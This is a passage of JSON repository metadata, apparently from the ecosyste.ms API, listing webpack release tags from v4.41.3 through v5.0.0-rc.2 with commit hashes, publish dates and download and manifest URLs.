rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/